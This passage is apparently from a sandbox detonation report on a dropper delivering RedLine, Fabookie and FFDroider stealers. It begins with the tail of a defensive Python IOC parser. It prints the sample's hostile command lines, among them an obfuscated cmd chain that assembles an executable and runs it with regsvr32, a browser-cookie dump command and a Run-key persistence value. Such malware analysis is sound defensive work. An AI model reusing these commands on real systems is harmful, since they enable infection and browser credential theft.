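    rf"PID 2092 wrote to memory of 3056 N/A {DROPPER} {TMP}\file_clu.exe",
    rf"PID 2092 wrote to memory of 2960 N/A {DROPPER} {TMP}\secd.exe",
    rf"PID 2092 wrote to memory of 2932 N/A {DROPPER} {TMP}\cld.exe",
    rf"PID 3056 wrote to memory of 2716 N/A {TMP}\file_clu.exe C:\Windows\SysWOW64\cmd.exe",
    rf"PID 2716 wrote to memory of 1884 N/A C:\Windows\SysWOW64\cmd.exe {TMP}\RwJ2xhfygvdE.exe",
    rf"PID 2960 wrote to memory of 468 N/A {TMP}\secd.exe {TMP}\RarSFX1\quv.exe",
    rf"PID 2932 wrote to memory of 1696 N/A {TMP}\cld.exe {TMP}\RarSFX2\per.exe",
    rf"PID 468 set thread context of 2892 N/A {TMP}\RarSFX1\quv.exe {TMP}\RarSFX1\quv.exe",
]

# Registry keys and domains carry no spaces; process paths may, so they match lazily up to Target.
REG = re.compile(r'^(?P<op>Key opened|Key created|Key value queried|Set value \(\w+\)) '
                 r'(?P<key>\\REGISTRY\\\S+)(?: = (?P<val>"[^"]*"|\S+))? (?P<proc>.+?) N/A$')
DOMAIN = re.compile(r'^N/A (?P<domain>[A-Za-z0-9.-]+\.[A-Za-z]{2,}) N/A N/A$')
FILE = re.compile(r'^File created (?P<path>.+?) (?P<proc>[A-Z]:\\.+?) N/A$')
PIDROW = re.compile(r'^PID (?P<src>\d+) (?P<what>wrote to memory of|set thread context of) '
                    r'(?P<dst>\d+) N/A (?P<sproc>.+?) (?P<dproc>[A-Z]:\\.+)$')
# (IOC kind, required op prefix, key substring); the kind names are this example's own.
RULES = [("persistence-run-key", "Set value", "\\currentversion\\run\\"),
         ("anti-vm-check", "", "\\acpi\\dsdt\\vbox__"), ("uac-check", "", "\\enablelua"),
         ("root-cert-install", "", "\\systemcertificates\\authroot\\certificates\\")]

def basename(path):
    return path.rsplit("\\", 1)[-1]

def classify_registry(op, key):
    k = key.lower()
    return next((kind for kind, pre, needle in RULES if op.startswith(pre) and needle in k), "registry-other")

def parse_rows(rows):
    """Return de-duplicated IOCs, unique parent->child edges and SetThreadContext injections."""
    iocs, edges, injections = {}, {}, []
    for row in rows:
        if m := REG.match(row):
            val = m["val"]
            if val and val.startswith('"'):
                val = val[1:-1].replace("\\\\", "\\")  # undo the report's string escaping
            kind = classify_registry(m["op"], m["key"])
            ioc = {"kind": kind, "key": m["key"], "value": val, "process": m["proc"]}
            if kind == "root-cert-install":
                ioc["thumbprint"] = basename(m["key"])
        elif m := DOMAIN.match(row):
            ioc = {"kind": "network-domain", "key": None, "value": m["domain"]}
        elif m := FILE.match(row):
            kind = "ntfs-ads" if ":" in basename(m["path"]) else "file-created"
            ioc = {"kind": kind, "key": None, "value": m["path"], "process": m["proc"]}
        elif m := PIDROW.match(row):
            edge = (int(m["src"]), int(m["dst"]), m["sproc"], m["dproc"])
            if m["what"].startswith("wrote"):
                edges[edge[:2]] = edge  # one edge per (parent, child), however many writes
            else:
                injections.append(edge)
            continue
        else:
            continue  # N/A-only rows carry no indicator
        iocs.setdefault((ioc["kind"], ioc["key"], ioc["value"]), ioc)  # repeated rows collapse
    return {"iocs": list(iocs.values()), "edges": list(edges.values()), "injections": injections}

def process_tree(edges):
    """Indented 'PID image' lines; roots are PIDs that never appear as a child."""
    children, names = defaultdict(list), {}
    for ppid, cpid, pname, cname in edges:
        children[ppid].append(cpid)
        names.setdefault(ppid, pname); names.setdefault(cpid, cname)
    lines = []
    def walk(pid, depth):
        lines.append("  " * depth + f"{pid} {basename(names[pid])}")
        for c in children.get(pid, []):
            walk(c, depth + 1)
    for root in sorted(set(children) - {c for kids in children.values() for c in kids}):
        walk(root, 0)
    return lines

def injection_notes(injections):
    """SetThreadContext on a child running the same image is the RunPE/hollowing shape."""
    return [f"{s} -> {d}: SetThreadContext on {basename(dp)}"
            + (" (same image: hollowing candidate)" if basename(sp).lower() == basename(dp).lower() else "")
            for s, d, sp, dp in injections]

if __name__ == "__main__":
    r = parse_rows(ROWS)
    print(*r["iocs"], *process_tree(r["edges"]), *injection_notes(r["injections"]), sep="\n")
```

Run it as a script to print the IOC list, the tree and the injection note. The tree is built only from WriteProcessMemory parent/child pairs, so a child created without a memory write, or outside the sampled rows, will not appear; cross-check it against the Processes section of the full report before treating it as the complete execution chain.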

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2092 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\file_clu.exe
PID 2092 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\file_clu.exe
PID 2092 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\file_clu.exe
PID 2092 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\file_clu.exe
PID 2092 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\file_clu.exe
PID 2092 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\file_clu.exe
PID 2092 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\file_clu.exe
PID 2092 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe
PID 2092 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe
PID 2092 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe
PID 2092 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe
PID 2092 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\asj.exe
PID 2092 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\asj.exe
PID 2092 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\asj.exe
PID 2092 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\asj.exe
PID 2092 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\secd.exe
PID 2092 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\secd.exe
PID 2092 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\secd.exe
PID 2092 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\secd.exe
PID 3056 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\file_clu.exe C:\Windows\SysWOW64\cmd.exe
PID 3056 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\file_clu.exe C:\Windows\SysWOW64\cmd.exe
PID 3056 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\file_clu.exe C:\Windows\SysWOW64\cmd.exe
PID 3056 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\file_clu.exe C:\Windows\SysWOW64\cmd.exe
PID 3056 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\file_clu.exe C:\Windows\SysWOW64\cmd.exe
PID 3056 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\file_clu.exe C:\Windows\SysWOW64\cmd.exe
PID 3056 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\file_clu.exe C:\Windows\SysWOW64\cmd.exe
PID 2092 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\cld.exe
PID 2092 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\cld.exe
PID 2092 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\cld.exe
PID 2092 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\cld.exe
PID 2960 wrote to memory of 468 N/A C:\Users\Admin\AppData\Local\Temp\secd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe
PID 2960 wrote to memory of 468 N/A C:\Users\Admin\AppData\Local\Temp\secd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe
PID 2960 wrote to memory of 468 N/A C:\Users\Admin\AppData\Local\Temp\secd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe
PID 2960 wrote to memory of 468 N/A C:\Users\Admin\AppData\Local\Temp\secd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe
PID 2092 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\ubisoftant.exe
PID 2092 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\ubisoftant.exe
PID 2092 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\ubisoftant.exe
PID 2092 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\ubisoftant.exe
PID 2092 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\piz.exe
PID 2716 wrote to memory of 1884 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe
PID 2932 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\cld.exe C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe
PID 2092 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe
PID 1884 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe

"C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe"

C:\Users\Admin\AppData\Local\Temp\file_clu.exe

"C:\Users\Admin\AppData\Local\Temp\file_clu.exe"

C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe

"C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe"

C:\Users\Admin\AppData\Local\Temp\asj.exe

"C:\Users\Admin\AppData\Local\Temp\asj.exe"

C:\Users\Admin\AppData\Local\Temp\secd.exe

"C:\Users\Admin\AppData\Local\Temp\secd.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C copy /Y "C:\Users\Admin\AppData\Local\Temp\file_clu.exe" ..\RwJ2xhfygvdE.exe&& stArt ..\RwJ2xhfygvdE.exe /Pxcee7dXhg1LR & If "" == "" for %H In ( "C:\Users\Admin\AppData\Local\Temp\file_clu.exe" ) do taskkill /iM "%~nxH" /F

C:\Users\Admin\AppData\Local\Temp\cld.exe

"C:\Users\Admin\AppData\Local\Temp\cld.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe"

C:\Users\Admin\AppData\Local\Temp\ubisoftant.exe

"C:\Users\Admin\AppData\Local\Temp\ubisoftant.exe"

C:\Users\Admin\AppData\Local\Temp\piz.exe

"C:\Users\Admin\AppData\Local\Temp\piz.exe"

C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe

..\RwJ2xhfygvdE.exe /Pxcee7dXhg1LR

C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe"

C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe

"C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C copy /Y "C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe" ..\RwJ2xhfygvdE.exe&& stArt ..\RwJ2xhfygvdE.exe /Pxcee7dXhg1LR & If "/Pxcee7dXhg1LR " == "" for %H In ( "C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe" ) do taskkill /iM "%~nxH" /F

C:\Windows\SysWOW64\taskkill.exe

taskkill /iM "file_clu.exe" /F

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /C eCho | SEt /p = "MZ" > wUAR.VX & cOPy /Y /B wUAr.vX +~TED1E2.CFH + G62c.4+ H7__2BUr.8I + 3O0QMRE.5K + C1SM1U.Qa0 +s77950_.98+ MzfNNq.QI + W8Te.Qm7 + ALXC.kJM + 18CHh.JB + gWp3M.DH + 2CmT.ZW ..\_MORBZV.~5 &sTaRT regsvr32 -s ..\_MOrBZV.~5 -U& DEl /q *

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCho "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>wUAR.VX"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 -s ..\_MOrBZV.~5 -U

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1760 CREDAT:275457 /prefetch:2

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1760 CREDAT:4076562 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe

"{path}"

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1760 CREDAT:3814416 /prefetch:2

Network


Files

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-09 20:25

Reported

2024-11-09 20:27

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

FFDroider

stealer ffdroider

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

Ffdroider family

ffdroider

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\file_clu.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\secd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\cld.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng." C:\Users\Admin\AppData\Local\Temp\piz.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fiogdnnnljjlfjgkifccooilblmjflkm\5.18.6_0\manifest.json C:\Users\Admin\AppData\Local\Temp\asj.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2280 set thread context of 5780 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\piz.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\cld.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\file_clu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\ubisoftant.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\asj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\secd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ubisoftant.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ubisoftant.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
